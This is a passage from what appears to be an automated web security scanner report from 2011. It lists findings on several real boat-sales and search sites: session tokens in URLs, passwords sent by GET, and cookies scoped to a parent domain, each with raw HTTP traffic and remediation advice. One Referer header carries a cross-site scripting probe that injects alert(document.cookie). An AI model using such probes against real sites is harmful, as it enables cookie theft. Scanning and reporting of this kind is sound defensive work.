Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

6.2. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.boatxchange.com
Path:	/pboats/browse/Make/Regulator/search.html

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html;jsessionid=F9EB4170B90548636802CC9D85DA196C.tomcat1?d-49489-s=length&d-49489-p=1&d-49489-o=2&d-49489-n=1
http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html;jsessionid=F9EB4170B90548636802CC9D85DA196C.tomcat1?d-49489-s=location&d-49489-p=1&d-49489-o=2&d-49489-n=1
http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html;jsessionid=F9EB4170B90548636802CC9D85DA196C.tomcat1?d-49489-s=make&d-49489-p=1&d-49489-o=2&d-49489-n=1
http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html;jsessionid=F9EB4170B90548636802CC9D85DA196C.tomcat1?d-49489-s=price&d-49489-p=1&d-49489-o=2&d-49489-n=1
http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html;jsessionid=F9EB4170B90548636802CC9D85DA196C.tomcat1?d-49489-s=year&d-49489-p=1&d-49489-o=2&d-49489-n=1

Request

GET /pboats/browse/Make/Regulator/search.html HTTP/1.1
Host: www.boatxchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:29 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8n PHP/5.2.3 mod_jk/1.2.30
Set-Cookie: JSESSIONID=F9EB4170B90548636802CC9D85DA196C.tomcat1; Path=/pboats
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 39986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?><html xmlns="http://www.w3.org/199
...[SNIP]...
<th class="sortable">
<a href="search.html;jsessionid=F9EB4170B90548636802CC9D85DA196C.tomcat1?d-49489-s=year&d-49489-p=1&d-49489-o=2&d-49489-n=1">Year</a></th>
<th class="sortable">
<a href="search.html;jsessionid=F9EB4170B90548636802CC9D85DA196C.tomcat1?d-49489-s=make&d-49489-p=1&d-49489-o=2&d-49489-n=1">Make/Model</a>
...[SNIP]...
<th class="sortable">
<a href="search.html;jsessionid=F9EB4170B90548636802CC9D85DA196C.tomcat1?d-49489-s=length&d-49489-p=1&d-49489-o=2&d-49489-n=1">Length</a></th>
<th class="sortable">
<a href="search.html;jsessionid=F9EB4170B90548636802CC9D85DA196C.tomcat1?d-49489-s=price&d-49489-p=1&d-49489-o=2&d-49489-n=1">Price</a></th>
<th class="sortable">
<a href="search.html;jsessionid=F9EB4170B90548636802CC9D85DA196C.tomcat1?d-49489-s=location&d-49489-p=1&d-49489-o=2&d-49489-n=1">Location</a>
...[SNIP]...

7. Password field submitted using GET method previous next
There are 3 instances of this issue:

/ja-ask-dialog
/ja-ask-dialog
/settings

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

7.1. http://www.ask.com/ja-ask-dialog previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ask.com
Path:	/ja-ask-dialog

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://secure.ask.com/ja-authenticate

The form contains the following password field:

password

Request

Response

7.2. http://www.ask.com/ja-ask-dialog previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ask.com
Path:	/ja-ask-dialog

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://secure.ask.com/ja-authenticate

The form contains the following password field:

password

Request

Response

7.3. http://www.ask.com/settings previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ask.com
Path:	/settings

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.ask.com/settings

The form contains the following password fields:

currentpassword
newpassword
password

Request

Response

8. Cookie scoped to parent domain previous next
There are 29 instances of this issue:

http://www.boats.com/boat-transport/index.jsp
http://www.boats.com/boat-transport/index.jsp
http://www.boats.com/includes/script_declarations.jsp
http://ads.pointroll.com/PortalServe/
http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s44969984570052
http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539
http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s59107670621015
http://www.ask.com/
http://www.ask.com/
http://www.ask.com/about
http://www.ask.com/about/legal/privacy
http://www.ask.com/about/legal/terms
http://www.ask.com/advertise
http://www.ask.com/ans
http://www.ask.com/answers
http://www.ask.com/answers/000/Notification
http://www.ask.com/homepage
http://www.ask.com/ja-ask-dialog
http://www.ask.com/pictures
http://www.ask.com/pictureslanding
http://www.ask.com/questionoftheday
http://www.ask.com/settings
http://www.ask.com/skins
http://www.ask.com/videos
http://www.ask.com/web
http://www.ask.com/webadvanced
https://www.linkedin.com/secure/login
http://www.reel-time.com/forum/showthread.php
http://wzus1.ask.com/i/i.gif

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

8.1. http://www.boats.com/boat-transport/index.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.boats.com
Path:	/boat-transport/index.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Apache=10.71.0.26.1296157759692870; path=/; expires=Sat, 29-Jan-11 19:49:19 GMT; domain=.boats.com
NAV_ELEMENT=insurance; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
cuid=4919575020154734820; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
SL_Audience=390|Accelerated|593|1|0;Expires=Sat, 26-Jan-13 19:49:19 GMT;Path=/;Domain=.boats.com

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boat-transport/index.jsp HTTP/1.1
Host: www.boats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:49:19 GMT
Server: Apache
Set-Cookie: Apache=10.71.0.26.1296157759692870; path=/; expires=Sat, 29-Jan-11 19:49:19 GMT; domain=.boats.com
Cache-Control: private
Content-Language: en-US
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats.listing_search_country_id_us=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats.active_sub_domain_listing_search_country_id=US; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: NAV_ELEMENT=insurance; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: cuid=4919575020154734820; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Set-Cookie: JSESSIONID=ccjBA_HEbqX_; path=/
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SL_Audience=390|Accelerated|593|1|0;Expires=Sat, 26-Jan-13 19:49:19 GMT;Path=/;Domain=.boats.com
Set-Cookie: SL_UVId=2B10123C94A63B7A;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Sat, 29-Jan-11 07:49:19 GMT;Path=/;Domain=.boats.com
X-SL-CompState: Recompiling

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head><script>var __$1a49={BaseUrl:(("https:"==document.location.protocol)?"https:":"http:")+"//analytics.strangeloopnetworks.com/",Gi
...[SNIP]...

8.2. http://www.boats.com/boat-transport/index.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.boats.com
Path:	/boat-transport/index.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
Apache=10.71.0.26.1296157759693449; path=/; expires=Sat, 29-Jan-11 19:49:19 GMT; domain=.boats.com
boats_temp_info=lf:ywlf; domain=.boats.com; path=/
SL_Audience=687|Accelerated|824|1|0;Expires=Sat, 26-Jan-13 19:49:19 GMT;Path=/;Domain=.boats.com

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boat-transport/index.jsp?source=yachtworld&yw_country=US HTTP/1.1
Host: www.boats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.3. http://www.boats.com/includes/script_declarations.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.boats.com
Path:	/includes/script_declarations.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:58:56 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:58:56 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:58:56 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /includes/script_declarations.jsp HTTP/1.1
Host: www.boats.com
Proxy-Connection: keep-alive
Referer: http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US33d06'%3balert(document.cookie)//ec734b2bd35
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=10.71.0.26.1296158327533912; boats.listing_search_country_id_us=100; boats.active_sub_domain_listing_search_country_id=US; boats.listing_search_country_id=100; boats_temp_info=lf:ywlf; boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; JSESSIONID=cSMocIKhHOUf; SL_Audience=557|Accelerated|241|1|0; SL_UVId=2B10137914B699B6; SL_NV1=1|1

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:58:57 GMT
Server: Apache
Cache-Control: private
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:58:56 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:58:56 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:58:56 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:58:56 GMT
Set-Cookie: boats.listing_search_country_id_us=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:58:56 GMT
Set-Cookie: boats.active_sub_domain_listing_search_country_id=US; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:58:56 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:58:56 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html
Set-Cookie: SL_UVId=2B10137914B699B6;path=/;
X-SL-CompState: Uncompiled
X-Strangeloop: Compression
Content-Length: 1695

function phpads_deliverActiveX(content)
{
document.write(content);
}

function resize() {
if (saveInnerWidth != window.innerWidth || saveInnerHeight != window.innerHeight)
this.location.rel
...[SNIP]...

8.4. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PRgo=BBBAAsJvEBVBF4FRCF-19!BDC_!B!BECb!B!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1166930O62320101223173924&cid=1423823&pos=h&redir=http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c%3F$CTURL$&time=4|13:19|-6&r=0.09495983109809458&flash=10&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CGJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmsqeeAmKAGSBCeJC5EmquI3yjbAwiBDeJWGEmrX5yd4zACLBEe; PRgo=BBBAAsJvEBVBF4FRCF-19!BDC_!B!BECb!B!B; PRimp=CA9A0400-789E-8A09-0309-05A001920102; PRca=|AJxY*1039:1|AJd9*1774:1|AJcC*23172:5|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJcCAAB5:3|AJcCAACG:1|AJxYAAQl:1|AJd9AA2c:1|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|Epn7:1|Epn6:2|FAnn:1|Eyzw:1|Eihq:1|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|Fy8u:1|Fy8x:1|GAty:1|FwyX:1|Fy9A:3|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|Epn7Fy8u:1|Epn6Fy9A:2|FAnnFy8x:1|EyzwGAty:1|EihqFwyX:1|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

8.5. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s44969984570052 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.yachtworld.com
Path:	/b/ss/deyachtworld/1/H.17/s44969984570052

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|26A0E41C85163315-40000182C057302B[CE]; Expires=Tue, 26 Jan 2016 19:32:09 GMT; Domain=.yachtworld.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/deyachtworld/1/H.17/s44969984570052?AQB=1&ndh=1&t=27/0/2011%2013%3A32%3A32%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=emailLead_US&g=http%3A//www.yachtworld.com/southpaw/southpaw_5.html&cc=USD&c28=emailLead_US%3AsendLead%3A%28No%20Data%20Entered%29&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pe=lnk_o&pev1=http%3A//www.yachtworld.com/southpaw/%23&pev2=Form%20Analysis&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/southpaw/southpaw_5.html
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:32:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26A0E41C85163315-40000182C057302B[CE]; Expires=Tue, 26 Jan 2016 19:32:09 GMT; Domain=.yachtworld.com; Path=/
Location: http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s44969984570052?AQB=1&pccr=true&vidn=26A0E41C85163315-40000182C057302B&&ndh=1&t=27/0/2011%2013%3A32%3A32%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=emailLead_US&g=http%3A//www.yachtworld.com/southpaw/southpaw_5.html&cc=USD&c28=emailLead_US%3AsendLead%3A%28No%20Data%20Entered%29&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pe=lnk_o&pev1=http%3A//www.yachtworld.com/southpaw/%23&pev2=Form%20Analysis&AQE=1
X-C: ms-4.3.1
Expires: Wed, 26 Jan 2011 19:32:09 GMT
Last-Modified: Fri, 28 Jan 2011 19:32:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www422
Content-Length: 0
Content-Type: text/plain

8.6. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.yachtworld.com
Path:	/b/ss/deyachtworld/1/H.17/s48372025459539

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; Expires=Tue, 26 Jan 2016 19:16:55 GMT; Domain=.yachtworld.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/deyachtworld/1/H.17/s48372025459539?AQB=1&ndh=1&t=27/0/2011%2013%3A17%3A16%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/core/listing/cache/pl_search_results.jsp%3Fywo%3Dstarlingmarine%26ps%3D50%26type%3D%26new%3D%26luom%3D126%26hosturl%3Dstarlingmarine%26page%3Dbroker%26slim%3Dbroker%26lineonly&r=http%3A//www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&v22=2%3A15PM&c23=Thursday&v23=Thursday&c24=Weekday&v24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=713&bh=1200&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=&new=&luom=126&hosturl=starlingmarine&page=broker&slim=broker&lineonly
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.1.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155836661%7C1298747836661%3B%20s_lv%3D1296155836663%7C1390763836663%3B%20s_lv_s%3DFirst%2520Visit%7C1296157636663%3B

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:16:55 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; Expires=Tue, 26 Jan 2016 19:16:55 GMT; Domain=.yachtworld.com; Path=/
Location: http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539?AQB=1&pccr=true&vidn=26A0E25385162B05-600001A6003F61D3&&ndh=1&t=27/0/2011%2013%3A17%3A16%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/core/listing/cache/pl_search_results.jsp%3Fywo%3Dstarlingmarine%26ps%3D50%26type%3D%26new%3D%26luom%3D126%26hosturl%3Dstarlingmarine%26page%3Dbroker%26slim%3Dbroker%26lineonly&r=http%3A//www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&v22=2%3A15PM&c23=Thursday&v23=Thursday&c24=Weekday&v24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=713&bh=1200&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Wed, 26 Jan 2011 19:16:55 GMT
Last-Modified: Fri, 28 Jan 2011 19:16:55 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www648
Content-Length: 0
Content-Type: text/plain

8.7. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s59107670621015 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.yachtworld.com
Path:	/b/ss/deyachtworld/1/H.17/s59107670621015

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|26A0FFE785012E5B-6000010D80001CDA[CE]; Expires=Tue, 26 Jan 2016 23:29:19 GMT; Domain=.yachtworld.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

